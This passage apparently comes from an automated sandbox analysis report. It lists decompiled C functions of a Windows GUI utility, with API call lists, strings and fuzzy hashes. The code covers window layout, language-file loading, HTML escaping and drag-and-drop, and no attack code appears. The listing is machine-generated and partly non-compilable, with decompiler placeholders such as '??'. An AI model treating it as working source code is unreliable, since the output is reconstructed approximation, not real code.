                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Delete_snwprintfmemset$Close
                                                                                                  • String ID: %s\shell\%s$%s\shell\%s\command
                                                                                                  • API String ID: 1018939227-3575174989
                                                                                                  • Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                  • Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
                                                                                                  • Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                  • Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 58%
                                                                                                  			E0040313D(void* __ecx) {
                                                                                                  				intOrPtr _v8;
                                                                                                  				char _v12;
                                                                                                  				struct HWND__* _t6;
                                                                                                  				_Unknown_base(*)()* _t11;
                                                                                                  				struct HWND__* _t15;
                                                                                                  				void* _t20;
                                                                                                  				struct HINSTANCE__* _t23;
                                                                                                  
                                                                                                  				_v12 = 8;
                                                                                                  				_v8 = 0xff;
                                                                                                  				_t15 = 0;
                                                                                                  				_t20 = 0;
                                                                                                  				_t23 = LoadLibraryW(L"comctl32.dll");
                                                                                                  				if(_t23 == 0) {
                                                                                                  					L5:
                                                                                                  					__imp__#17();
                                                                                                  					_t6 = 1;
                                                                                                  					L6:
                                                                                                  					if(_t6 != 0) {
                                                                                                  						return 1;
                                                                                                  					} else {
                                                                                                  						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
                                                                                                  						return 0;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
                                                                                                  				if(_t11 != 0) {
                                                                                                  					_t20 = 1;
                                                                                                  					_t15 =  *_t11( &_v12);
                                                                                                  				}
                                                                                                  				FreeLibrary(_t23);
                                                                                                  				if(_t20 == 0) {
                                                                                                  					goto L5;
                                                                                                  				} else {
                                                                                                  					_t6 = _t15;
                                                                                                  					goto L6;
                                                                                                  				}
                                                                                                  			}










                                                                                                  0x0040314a
                                                                                                  0x00403151
                                                                                                  0x00403158
                                                                                                  0x0040315a
                                                                                                  0x00403162
                                                                                                  0x00403166
                                                                                                  0x00403190
                                                                                                  0x00403190
                                                                                                  0x00403198
                                                                                                  0x00403199
                                                                                                  0x0040319e
                                                                                                  0x004031bb
                                                                                                  0x004031a0
                                                                                                  0x004031ad
                                                                                                  0x004031b6
                                                                                                  0x004031b6
                                                                                                  0x0040319e
                                                                                                  0x0040316e
                                                                                                  0x00403176
                                                                                                  0x0040317c
                                                                                                  0x0040317f
                                                                                                  0x0040317f
                                                                                                  0x00403182
                                                                                                  0x0040318a
                                                                                                  0x00000000
                                                                                                  0x0040318c
                                                                                                  0x0040318c
                                                                                                  0x00000000
                                                                                                  0x0040318c

                                                                                                  APIs
                                                                                                  • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                  • #17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
                                                                                                  • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                  • API String ID: 2780580303-317687271
                                                                                                  • Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                  • Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
                                                                                                  • Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                  • Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 85%
                                                                                                  			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
                                                                                                  				struct HWND__* _v8;
                                                                                                  				struct HWND__* _v12;
                                                                                                  				struct tagRECT _v28;
                                                                                                  				struct tagRECT _v44;
                                                                                                  				int _t50;
                                                                                                  				long _t61;
                                                                                                  				struct HDC__* _t63;
                                                                                                  				intOrPtr _t65;
                                                                                                  				intOrPtr _t68;
                                                                                                  				struct HWND__* _t71;
                                                                                                  				intOrPtr _t72;
                                                                                                  				void* _t73;
                                                                                                  				int _t74;
                                                                                                  				int _t80;
                                                                                                  				int _t83;
                                                                                                  
                                                                                                  				_t73 = __edx;
                                                                                                  				_v8 = 0;
                                                                                                  				_v12 = 0;
                                                                                                  				_t74 = GetSystemMetrics(0x11);
                                                                                                  				_t80 = GetSystemMetrics(0x10);
                                                                                                  				if(_t74 == 0 || _t80 == 0) {
                                                                                                  					_t63 = GetDC(0);
                                                                                                  					_t80 = GetDeviceCaps(_t63, 8);
                                                                                                  					_t74 = GetDeviceCaps(_t63, 0xa);
                                                                                                  					ReleaseDC(0, _t63);
                                                                                                  				}
                                                                                                  				GetWindowRect(_a4,  &_v44);
                                                                                                  				if((_a8 & 0x00000004) != 0) {
                                                                                                  					_t71 = GetParent(_a4);
                                                                                                  					if(_t71 != 0) {
                                                                                                  						_v28.left = _v28.left & 0x00000000;
                                                                                                  						asm("stosd");
                                                                                                  						asm("stosd");
                                                                                                  						asm("stosd");
                                                                                                  						GetWindowRect(_t71,  &_v28);
                                                                                                  						_t61 = _v28.left;
                                                                                                  						_t72 = _v28.top;
                                                                                                  						_t80 = _v28.right - _t61 + 1;
                                                                                                  						_t74 = _v28.bottom - _t72 + 1;
                                                                                                  						_v8 = _t61;
                                                                                                  						_v12 = _t72;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				_t65 = _v44.right;
                                                                                                  				if((_a8 & 0x00000001) == 0) {
                                                                                                  					asm("cdq");
                                                                                                  					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
                                                                                                  				} else {
                                                                                                  					_t83 = 0;
                                                                                                  				}
                                                                                                  				_t68 = _v44.bottom;
                                                                                                  				if((_a8 & 0x00000002) != 0) {
                                                                                                  					L11:
                                                                                                  					_t50 = 0;
                                                                                                  					goto L12;
                                                                                                  				} else {
                                                                                                  					asm("cdq");
                                                                                                  					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
                                                                                                  					if(_t50 >= 0) {
                                                                                                  						L12:
                                                                                                  						if(_t83 < 0) {
                                                                                                  							_t83 = 0;
                                                                                                  						}
                                                                                                  						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
                                                                                                  					}
                                                                                                  					goto L11;
                                                                                                  				}
                                                                                                  			}


















                                                                                                  0x00404da9
                                                                                                  0x00404dbc
                                                                                                  0x00404dbf
                                                                                                  0x00404dc6
                                                                                                  0x00404dcc
                                                                                                  0x00404dce
                                                                                                  0x00404de1
                                                                                                  0x00404deb
                                                                                                  0x00404df2
                                                                                                  0x00404df4
                                                                                                  0x00404df4
                                                                                                  0x00404e07
                                                                                                  0x00404e0d
                                                                                                  0x00404e18
                                                                                                  0x00404e1c
                                                                                                  0x00404e1e
                                                                                                  0x00404e27
                                                                                                  0x00404e28
                                                                                                  0x00404e29
                                                                                                  0x00404e2f
                                                                                                  0x00404e31
                                                                                                  0x00404e37
                                                                                                  0x00404e41
                                                                                                  0x00404e42
                                                                                                  0x00404e43
                                                                                                  0x00404e46
                                                                                                  0x00404e46
                                                                                                  0x00404e1c
                                                                                                  0x00404e4d
                                                                                                  0x00404e50
                                                                                                  0x00404e5f
                                                                                                  0x00404e66
                                                                                                  0x00404e52
                                                                                                  0x00404e52
                                                                                                  0x00404e52
                                                                                                  0x00404e6d
                                                                                                  0x00404e70
                                                                                                  0x00404e85
                                                                                                  0x00404e85
                                                                                                  0x00000000
                                                                                                  0x00404e72
                                                                                                  0x00404e7b
                                                                                                  0x00404e80
                                                                                                  0x00404e83
                                                                                                  0x00404e87
                                                                                                  0x00404e89
                                                                                                  0x00404e8b
                                                                                                  0x00404e8b
                                                                                                  0x00404ea8
                                                                                                  0x00404ea8
                                                                                                  0x00000000
                                                                                                  0x00404e83

                                                                                                  APIs
                                                                                                  • GetSystemMetrics.USER32 ref: 00404DC2
                                                                                                  • GetSystemMetrics.USER32 ref: 00404DC8
                                                                                                  • GetDC.USER32(00000000), ref: 00404DD5
                                                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
                                                                                                  • ReleaseDC.USER32 ref: 00404DF4
                                                                                                  • GetWindowRect.USER32 ref: 00404E07
                                                                                                  • GetParent.USER32(?), ref: 00404E12
                                                                                                  • GetWindowRect.USER32 ref: 00404E2F
                                                                                                  • MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                  • String ID:
                                                                                                  • API String ID: 2163313125-0
                                                                                                  • Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                  • Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
                                                                                                  • Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                  • Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 88%
                                                                                                  			E00406398(void* __eflags, wchar_t* _a4) {
                                                                                                  				void* __esi;
                                                                                                  				void* _t3;
                                                                                                  				int _t6;
                                                                                                  
                                                                                                  				_t3 = E00404AAA(_a4);
                                                                                                  				if(_t3 != 0) {
                                                                                                  					wcscpy(0x40fb90, _a4);
                                                                                                  					wcscpy(0x40fda0, L"general");
                                                                                                  					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
                                                                                                  					asm("sbb eax, eax");
                                                                                                  					 *0x40fe28 =  ~(_t6 - 1) + 1;
                                                                                                  					E00405F14(0x40fe30, L"charset", 0x3f);
                                                                                                  					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
                                                                                                  					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
                                                                                                  				}
                                                                                                  				return _t3;
                                                                                                  			}






                                                                                                  0x0040639c
                                                                                                  0x004063a4
                                                                                                  0x004063b2
                                                                                                  0x004063c2
                                                                                                  0x004063d3
                                                                                                  0x004063dc
                                                                                                  0x004063eb
                                                                                                  0x004063f0
                                                                                                  0x00406401
                                                                                                  0x00000000
                                                                                                  0x0040641e
                                                                                                  0x0040641f

                                                                                                  APIs
                                                                                                    • Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE
                                                                                                  • wcscpy.MSVCRT ref: 004063B2
                                                                                                  • wcscpy.MSVCRT ref: 004063C2
                                                                                                  • GetPrivateProfileIntW.KERNEL32 ref: 004063D3
                                                                                                    • Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32 ref: 00405F30
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                  • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                  • API String ID: 3176057301-2039793938
                                                                                                  • Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                  • Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
                                                                                                  • Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                  • Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 16%
                                                                                                  			E0040ADF1(signed short* __eax, void* __ecx) {
                                                                                                  				void* _t2;
                                                                                                  				signed short* _t3;
                                                                                                  				void* _t7;
                                                                                                  				void* _t8;
                                                                                                  				void* _t10;
                                                                                                  
                                                                                                  				_t3 = __eax;
                                                                                                  				_t8 = __ecx;
                                                                                                  				_t7 = 8;
                                                                                                  				while(1) {
                                                                                                  					_t2 =  *_t3 & 0x0000ffff;
                                                                                                  					if(_t2 != 0x3c) {
                                                                                                  						goto L3;
                                                                                                  					}
                                                                                                  					_push(_t7);
                                                                                                  					_push(L"&lt;");
                                                                                                  					L14:
                                                                                                  					_t2 = memcpy(_t8, ??, ??);
                                                                                                  					_t10 = _t10 + 0xc;
                                                                                                  					_t8 = _t8 + _t7;
                                                                                                  					L16:
                                                                                                  					if( *_t3 != 0) {
                                                                                                  						_t3 =  &(_t3[1]);
                                                                                                  						continue;
                                                                                                  					}
                                                                                                  					return _t2;
                                                                                                  					L3:
                                                                                                  					if(_t2 != 0x3e) {
                                                                                                  						if(_t2 != 0x22) {
                                                                                                  							if((_t2 & 0x0000ffff) != 0xffffffb0) {
                                                                                                  								if(_t2 != 0x26) {
                                                                                                  									if(_t2 != 0xa) {
                                                                                                  										 *_t8 = _t2;
                                                                                                  										_t8 = _t8 + 2;
                                                                                                  									} else {
                                                                                                  										_push(_t7);
                                                                                                  										_push(L"<br>");
                                                                                                  										goto L14;
                                                                                                  									}
                                                                                                  								} else {
                                                                                                  									_push(0xa);
                                                                                                  									_push(L"&amp;");
                                                                                                  									goto L11;
                                                                                                  								}
                                                                                                  							} else {
                                                                                                  								_push(0xa);
                                                                                                  								_push(L"&deg;");
                                                                                                  								L11:
                                                                                                  								_t2 = memcpy(_t8, ??, ??);
                                                                                                  								_t10 = _t10 + 0xc;
                                                                                                  								_t8 = _t8 + 0xa;
                                                                                                  							}
                                                                                                  						} else {
                                                                                                  							_t2 = memcpy(_t8, L"&quot;", 0xc);
                                                                                                  							_t10 = _t10 + 0xc;
                                                                                                  							_t8 = _t8 + 0xc;
                                                                                                  						}
                                                                                                  					} else {
                                                                                                  						_push(_t7);
                                                                                                  						_push(L"&gt;");
                                                                                                  						goto L14;
                                                                                                  					}
                                                                                                  					goto L16;
                                                                                                  				}
                                                                                                  			}








                                                                                                  0x0040adf6
                                                                                                  0x0040adf8
                                                                                                  0x0040adfa
                                                                                                  0x0040adfb
                                                                                                  0x0040adfb
                                                                                                  0x0040ae02
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x0040ae04
                                                                                                  0x0040ae05
                                                                                                  0x0040ae6d
                                                                                                  0x0040ae6e
                                                                                                  0x0040ae73
                                                                                                  0x0040ae76
                                                                                                  0x0040ae7f
                                                                                                  0x0040ae83
                                                                                                  0x0040ae86
                                                                                                  0x00000000
                                                                                                  0x0040ae86
                                                                                                  0x0040ae8f
                                                                                                  0x0040ae0c
                                                                                                  0x0040ae10
                                                                                                  0x0040ae1e
                                                                                                  0x0040ae3b
                                                                                                  0x0040ae4a
                                                                                                  0x0040ae65
                                                                                                  0x0040ae7a
                                                                                                  0x0040ae7e
                                                                                                  0x0040ae67
                                                                                                  0x0040ae67
                                                                                                  0x0040ae68
                                                                                                  0x00000000
                                                                                                  0x0040ae68
                                                                                                  0x0040ae4c
                                                                                                  0x0040ae4c
                                                                                                  0x0040ae4e
                                                                                                  0x00000000
                                                                                                  0x0040ae4e
                                                                                                  0x0040ae3d
                                                                                                  0x0040ae3d
                                                                                                  0x0040ae3f
                                                                                                  0x0040ae53
                                                                                                  0x0040ae54
                                                                                                  0x0040ae59
                                                                                                  0x0040ae5c
                                                                                                  0x0040ae5c
                                                                                                  0x0040ae20
                                                                                                  0x0040ae28
                                                                                                  0x0040ae2d
                                                                                                  0x0040ae30
                                                                                                  0x0040ae30
                                                                                                  0x0040ae12
                                                                                                  0x0040ae12
                                                                                                  0x0040ae13
                                                                                                  0x00000000
                                                                                                  0x0040ae13
                                                                                                  0x00000000
                                                                                                  0x0040ae10

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memcpy
                                                                                                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                  • API String ID: 3510742995-3273207271
                                                                                                  • Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                  • Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
                                                                                                  • Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                  • Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
                                                                                                  				struct HDWP__* _v8;
                                                                                                  				intOrPtr* _v12;
                                                                                                  				void _v534;
                                                                                                  				short _v536;
                                                                                                  				void* __ebx;
                                                                                                  				void* __edi;
                                                                                                  				intOrPtr _t42;
                                                                                                  				intOrPtr* _t95;
                                                                                                  				RECT* _t96;
                                                                                                  
                                                                                                  				_t95 = __ecx;
                                                                                                  				_v12 = __ecx;
                                                                                                  				if(_a4 == 0x233) {
                                                                                                  					_v536 = 0;
                                                                                                  					memset( &_v534, 0, 0x208);
                                                                                                  					DragQueryFileW(_a8, 0,  &_v536, 0x104);
                                                                                                  					DragFinish(_a8);
                                                                                                  					 *((intOrPtr*)( *_t95 + 4))(0);
                                                                                                  					E00404923(0x104, _t95 + 0x1680,  &_v536);
                                                                                                  					 *((intOrPtr*)( *_v12 + 4))(1);
                                                                                                  					_t95 = _v12;
                                                                                                  				}
                                                                                                  				if(_a4 != 5) {
                                                                                                  					if(_a4 != 0xf) {
                                                                                                  						if(_a4 == 0x24) {
                                                                                                  							_t42 = _a12;
                                                                                                  							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
                                                                                                  							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
                                                                                                  						}
                                                                                                  					} else {
                                                                                                  						E00402EC8(_t95 + 0x40);
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					_v8 = BeginDeferWindowPos(0xd);
                                                                                                  					_t96 = _t95 + 0x40;
                                                                                                  					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
                                                                                                  					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
                                                                                                  					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
                                                                                                  					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
                                                                                                  					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
                                                                                                  					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
                                                                                                  					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
                                                                                                  					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
                                                                                                  					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
                                                                                                  					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
                                                                                                  					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
                                                                                                  					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
                                                                                                  					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
                                                                                                  					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
                                                                                                  					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
                                                                                                  					EndDeferWindowPos(_v8);
                                                                                                  					InvalidateRect( *(_t96 + 0x10), _t96, 1);
                                                                                                  					_t95 = _v12;
                                                                                                  				}
                                                                                                  				return E00402CED(_t95, _a4, _a8, _a12);
                                                                                                  			}












                                                                                                  0x004041f9
                                                                                                  0x00404205
                                                                                                  0x00404208
                                                                                                  0x00404217
                                                                                                  0x0040421e
                                                                                                  0x00404236
                                                                                                  0x0040423f
                                                                                                  0x0040424a
                                                                                                  0x0040425f
                                                                                                  0x0040426b
                                                                                                  0x0040426e
                                                                                                  0x0040426e
                                                                                                  0x00404275
                                                                                                  0x004043be
                                                                                                  0x004043ce
                                                                                                  0x004043d0
                                                                                                  0x004043d3
                                                                                                  0x004043da
                                                                                                  0x004043da
                                                                                                  0x004043c0
                                                                                                  0x004043c3
                                                                                                  0x004043c3
                                                                                                  0x0040427b
                                                                                                  0x0040428c
                                                                                                  0x0040428f
                                                                                                  0x00404295
                                                                                                  0x004042a5
                                                                                                  0x004042b8
                                                                                                  0x004042cb
                                                                                                  0x004042de
                                                                                                  0x004042f1
                                                                                                  0x00404304
                                                                                                  0x00404317
                                                                                                  0x0040432a
                                                                                                  0x0040433d
                                                                                                  0x00404350
                                                                                                  0x00404363
                                                                                                  0x00404376
                                                                                                  0x00404389
                                                                                                  0x0040439c
                                                                                                  0x004043a4
                                                                                                  0x004043af
                                                                                                  0x004043b5
                                                                                                  0x004043b5
                                                                                                  0x004043f5

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0040421E
                                                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
                                                                                                  • DragFinish.SHELL32(?), ref: 0040423F
                                                                                                    • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                    • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                    • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                    • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                    • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                  • BeginDeferWindowPos.USER32 ref: 0040427D
                                                                                                  • EndDeferWindowPos.USER32(?), ref: 004043A4
                                                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 004043AF
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
                                                                                                  • String ID: $
                                                                                                  • API String ID: 2142561256-3993045852
                                                                                                  • Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                  • Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
                                                                                                  • Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                  • Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 55%
                                                                                                  			E00405B81(signed short __ebx) {
                                                                                                  				signed int _t21;
                                                                                                  				void* _t22;
                                                                                                  				struct HINSTANCE__* _t25;
                                                                                                  				signed int _t27;
                                                                                                  				void* _t35;
                                                                                                  				signed short _t39;
                                                                                                  				signed int _t40;
                                                                                                  				void* _t57;
                                                                                                  				int _t61;
                                                                                                  				void* _t62;
                                                                                                  				int _t71;
                                                                                                  
                                                                                                  				_t39 = __ebx;
                                                                                                  				if( *0x41c470 == 0) {
                                                                                                  					E00405ADF();
                                                                                                  				}
                                                                                                  				_t40 =  *0x41c468;
                                                                                                  				_t21 = 0;
                                                                                                  				if(_t40 <= 0) {
                                                                                                  					L5:
                                                                                                  					_t57 = 0;
                                                                                                  				} else {
                                                                                                  					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
                                                                                                  						_t21 = _t21 + 1;
                                                                                                  						if(_t21 < _t40) {
                                                                                                  							continue;
                                                                                                  						} else {
                                                                                                  							goto L5;
                                                                                                  						}
                                                                                                  						goto L6;
                                                                                                  					}
                                                                                                  					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
                                                                                                  				}
                                                                                                  				L6:
                                                                                                  				if(_t57 != 0) {
                                                                                                  					L21:
                                                                                                  					_t22 = _t57;
                                                                                                  				} else {
                                                                                                  					if((_t39 & 0x00010000) == 0) {
                                                                                                  						if( *0x40fb90 == 0) {
                                                                                                  							_push( *0x41c478 - 1);
                                                                                                  							_push( *0x41c45c);
                                                                                                  							_push(_t39);
                                                                                                  							_t25 = E00405CE7();
                                                                                                  							goto L15;
                                                                                                  						} else {
                                                                                                  							wcscpy(0x40fda0, L"strings");
                                                                                                  							_t35 = E00405EDD(_t39,  *0x41c45c);
                                                                                                  							_t62 = _t62 + 0x10;
                                                                                                  							if(_t35 == 0) {
                                                                                                  								L13:
                                                                                                  								_t25 = GetModuleHandleW(0);
                                                                                                  								_push( *0x41c478 - 1);
                                                                                                  								_push( *0x41c45c);
                                                                                                  								_push(_t39);
                                                                                                  								goto L15;
                                                                                                  							} else {
                                                                                                  								_t61 = wcslen( *0x41c45c);
                                                                                                  								if(_t61 == 0) {
                                                                                                  									goto L13;
                                                                                                  								}
                                                                                                  							}
                                                                                                  						}
                                                                                                  					} else {
                                                                                                  						_t25 = GetModuleHandleW(_t57);
                                                                                                  						_push( *0x41c478 - 1);
                                                                                                  						_push( *0x41c45c);
                                                                                                  						_push(_t39 & 0x0000ffff);
                                                                                                  						L15:
                                                                                                  						_t61 = LoadStringW(_t25, ??, ??, ??);
                                                                                                  						_t71 = _t61;
                                                                                                  					}
                                                                                                  					if(_t71 <= 0) {
                                                                                                  						L20:
                                                                                                  						_t22 = 0x40c4e8;
                                                                                                  					} else {
                                                                                                  						_t27 =  *0x41c46c;
                                                                                                  						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
                                                                                                  							goto L20;
                                                                                                  						} else {
                                                                                                  							_t57 =  *0x41c458 + _t27 * 2;
                                                                                                  							_t14 = _t61 + 2; // 0x2
                                                                                                  							memcpy(_t57,  *0x41c45c, _t61 + _t14);
